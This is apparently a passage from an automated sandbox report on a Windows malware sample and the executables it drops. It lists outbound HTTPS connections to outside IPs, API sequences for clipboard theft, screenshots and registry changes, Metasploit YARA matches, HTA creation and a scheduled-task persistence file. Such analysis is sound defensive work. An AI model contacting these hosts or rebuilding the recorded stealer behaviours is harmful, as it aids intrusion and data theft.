Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50130 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50132 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50133 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50157 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50162 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:50186 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:50188 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:50189 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:50191 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:50192 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50197 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50204 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50203 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50202 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50223 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50224 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50225 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:50227 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:50228 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50242 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50243 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:50246 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50245 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:50247 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50249 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50250 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:50252 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:50254 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:50257 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:50258 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe

Code function: 6_2_0043AF10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

6_2_0043AF10

Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe

Code function: 6_2_0043AF10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

6_2_0043AF10

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_009B61F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,

0_2_009B61F0

System Summary

Malicious sample detected (through community Yara rule)

Source: 0000000F.00000002.2728858042.000000000E03A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000000E.00000002.2623904415.000000000E332000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000000E.00000002.2623904415.000000000E3C2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000000F.00000002.2727875020.000000000DEDC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000000F.00000002.2727875020.000000000DF32000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000000E.00000002.2623904415.000000000E2DC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth

Binary is likely a compiled AutoIt script file

Source: 40c4d92e87.exe, 00000015.00000000.2769778747.0000000000932000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.		memstr_1814f6c8-1
Source: 40c4d92e87.exe, 00000015.00000000.2769778747.0000000000932000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer		memstr_0c09355f-6

Creates HTA files

Source: C:\Users\user\AppData\Local\Temp\10060350101\977b4d66ef.exe

File created: C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta

PE file contains section with special chars

Source: random[1].exe.2.dr	Static PE information: section name:
Source: random[1].exe.2.dr	Static PE information: section name: .idata
Source: 5a20b6327b.exe.2.dr	Static PE information: section name:
Source: 5a20b6327b.exe.2.dr	Static PE information: section name: .idata
Source: random[1].exe1.2.dr	Static PE information: section name:
Source: random[1].exe1.2.dr	Static PE information: section name: .idata
Source: random[1].exe1.2.dr	Static PE information: section name:
Source: 1e8e57d62a.exe.2.dr	Static PE information: section name:
Source: 1e8e57d62a.exe.2.dr	Static PE information: section name: .idata
Source: 1e8e57d62a.exe.2.dr	Static PE information: section name:
Source: random[1].exe2.2.dr	Static PE information: section name:
Source: random[1].exe2.2.dr	Static PE information: section name: .idata
Source: random[1].exe2.2.dr	Static PE information: section name:
Source: dd662b5386.exe.2.dr	Static PE information: section name:
Source: dd662b5386.exe.2.dr	Static PE information: section name: .idata
Source: dd662b5386.exe.2.dr	Static PE information: section name:
Source: random[2].exe.2.dr	Static PE information: section name:
Source: random[2].exe.2.dr	Static PE information: section name: .idata
Source: random[2].exe.2.dr	Static PE information: section name:
Source: dbe8776a6a.exe.2.dr	Static PE information: section name:
Source: dbe8776a6a.exe.2.dr	Static PE information: section name: .idata
Source: dbe8776a6a.exe.2.dr	Static PE information: section name:
Source: random[2].exe0.2.dr	Static PE information: section name:
Source: random[2].exe0.2.dr	Static PE information: section name: .idata
Source: 186adf2617.exe.2.dr	Static PE information: section name:
Source: 186adf2617.exe.2.dr	Static PE information: section name: .idata
Source: random[2].exe1.2.dr	Static PE information: section name:
Source: random[2].exe1.2.dr	Static PE information: section name: .idata
Source: random[2].exe1.2.dr	Static PE information: section name:
Source: 43a79b4335.exe.2.dr	Static PE information: section name:
Source: 43a79b4335.exe.2.dr	Static PE information: section name: .idata
Source: 43a79b4335.exe.2.dr	Static PE information: section name:
Source: random[3].exe.2.dr	Static PE information: section name:
Source: random[3].exe.2.dr	Static PE information: section name: .idata
Source: random[3].exe.2.dr	Static PE information: section name:
Source: cefa09b2a4.exe.2.dr	Static PE information: section name:
Source: cefa09b2a4.exe.2.dr	Static PE information: section name: .idata
Source: cefa09b2a4.exe.2.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\random.exe

File created: C:\Windows\Tasks\rapes.job

Jump to behavior

Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_009B61F0	0_2_009B61F0
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_009F4047	0_2_009F4047
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_009B51A0	0_2_009B51A0
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_009DB4C0	0_2_009DB4C0
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_009B5450	0_2_009B5450
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_009EC6DD	0_2_009EC6DD
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_009DF6DB	0_2_009DF6DB
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_009F18D7	0_2_009F18D7
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_009F5CD4	0_2_009F5CD4
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_009E2C20	0_2_009E2C20
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_009F5DF4	0_2_009F5DF4
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_009B4EF0	0_2_009B4EF0
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_009ECE69	0_2_009ECE69
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 1_2_00B74047	1_2_00B74047
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 1_2_00B351A0	1_2_00B351A0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 1_2_00B361F0	1_2_00B361F0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 1_2_00B5B4C0	1_2_00B5B4C0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 1_2_00B35450	1_2_00B35450
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 1_2_00B6C6DD	1_2_00B6C6DD
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 1_2_00B5F6DB	1_2_00B5F6DB
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 1_2_00B718D7	1_2_00B718D7
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 1_2_00B75CD4	1_2_00B75CD4
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 1_2_00B62C20	1_2_00B62C20
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 1_2_00B75DF4	1_2_00B75DF4
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 1_2_00B34EF0	1_2_00B34EF0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 1_2_00B6CE69	1_2_00B6CE69
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 2_2_00B361F0	2_2_00B361F0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 2_2_00B3B700	2_2_00B3B700
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 2_2_00B74047	2_2_00B74047
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 2_2_00B62C20	2_2_00B62C20
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 2_2_00B34EF0	2_2_00B34EF0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 2_2_00B6CE69	2_2_00B6CE69
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 2_2_00B351A0	2_2_00B351A0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 2_2_00B5B4C0	2_2_00B5B4C0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 2_2_00B35450	2_2_00B35450
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 2_2_00B5F6DB	2_2_00B5F6DB
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 2_2_00B718D7	2_2_00B718D7
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 2_2_00B75CD4	2_2_00B75CD4
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 2_2_00B75DF4	2_2_00B75DF4
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4_2_00652529	4_2_00652529
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00410990	6_2_00410990
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0040BA10	6_2_0040BA10
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00429210	6_2_00429210
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00433ADD	6_2_00433ADD
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00446AE0	6_2_00446AE0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0043F320	6_2_0043F320
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00433396	6_2_00433396
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_004475C0	6_2_004475C0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0043F640	6_2_0043F640
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00411605	6_2_00411605
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0042BF10	6_2_0042BF10
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00442710	6_2_00442710
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00447FB0	6_2_00447FB0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00401040	6_2_00401040
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00446040	6_2_00446040
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0041A855	6_2_0041A855
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00446810	6_2_00446810
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00410020	6_2_00410020
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00432830	6_2_00432830
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_004328D0	6_2_004328D0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_004298F0	6_2_004298F0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_004388A0	6_2_004388A0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_004400A0	6_2_004400A0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0042F156	6_2_0042F156
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00436162	6_2_00436162
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00446170	6_2_00446170
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00443100	6_2_00443100
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0043290E	6_2_0043290E
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00444115	6_2_00444115
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00413913	6_2_00413913
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0043291D	6_2_0043291D
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_004089D0	6_2_004089D0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_004349E0	6_2_004349E0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0040A1A0	6_2_0040A1A0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_004201AB	6_2_004201AB
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_004381BB	6_2_004381BB
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0040CA40	6_2_0040CA40
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0043AA40	6_2_0043AA40
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00447250	6_2_00447250
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00445A52	6_2_00445A52
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00421260	6_2_00421260
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00446230	6_2_00446230
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0042C2E0	6_2_0042C2E0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_004462F0	6_2_004462F0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00440A80	6_2_00440A80
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00402AB0	6_2_00402AB0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00421AB0	6_2_00421AB0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0041535E	6_2_0041535E
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0040E360	6_2_0040E360
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0040EB00	6_2_0040EB00
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0041CB11	6_2_0041CB11
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0043EB10	6_2_0043EB10
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0043C338	6_2_0043C338
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_004093C0	6_2_004093C0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_004503DE	6_2_004503DE
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_004403E0	6_2_004403E0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_004363F8	6_2_004363F8
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00426380	6_2_00426380
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0041ABA1	6_2_0041ABA1
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00429BA0	6_2_00429BA0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0041FBB0	6_2_0041FBB0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0042C3BD	6_2_0042C3BD
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00438C40	6_2_00438C40
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00424C60	6_2_00424C60
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_004034C0	6_2_004034C0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00437CC1	6_2_00437CC1
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00407CF0	6_2_00407CF0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0043ACF0	6_2_0043ACF0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0042D48E	6_2_0042D48E
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0041B4A4	6_2_0041B4A4
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0043D4B2	6_2_0043D4B2
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00429D50	6_2_00429D50
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0043ED70	6_2_0043ED70
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00421D10	6_2_00421D10
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0042CD16	6_2_0042CD16
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00429D2E	6_2_00429D2E
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00419D3C	6_2_00419D3C
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0043DD8B	6_2_0043DD8B
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0041DD90	6_2_0041DD90
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0040C5A0	6_2_0040C5A0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_004215A0	6_2_004215A0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_004235B0	6_2_004235B0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00408E40	6_2_00408E40
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0041C65D	6_2_0041C65D
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00403E60	6_2_00403E60
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00415E70	6_2_00415E70
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00435E03	6_2_00435E03
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00431600	6_2_00431600
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_004336C2	6_2_004336C2
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00431ED0	6_2_00431ED0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0043C6D0	6_2_0043C6D0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00446EE0	6_2_00446EE0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00439EF4	6_2_00439EF4
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00425E80	6_2_00425E80
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_004206A0	6_2_004206A0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0041BF43	6_2_0041BF43
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00404742	6_2_00404742
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00427F6B	6_2_00427F6B
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00420F00	6_2_00420F00
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00443F22	6_2_00443F22
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0042B7C8	6_2_0042B7C8
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00418FD7	6_2_00418FD7
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_004127E0	6_2_004127E0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00411FF7	6_2_00411FF7
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0041B7A5	6_2_0041B7A5
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CDFC89	11_3_00CDFC89
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CDFC89	11_3_00CDFC89
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CD965C	11_3_00CD965C
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CD965C	11_3_00CD965C
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CDA03F	11_3_00CDA03F
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CDA03F	11_3_00CDA03F
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CF15A6	11_3_00CF15A6
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CF15A6	11_3_00CF15A6
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CDFC89	11_3_00CDFC89
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CDFC89	11_3_00CDFC89
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CD965C	11_3_00CD965C
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CD965C	11_3_00CD965C
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CDA03F	11_3_00CDA03F
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CDA03F	11_3_00CDA03F
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CF15A6	11_3_00CF15A6
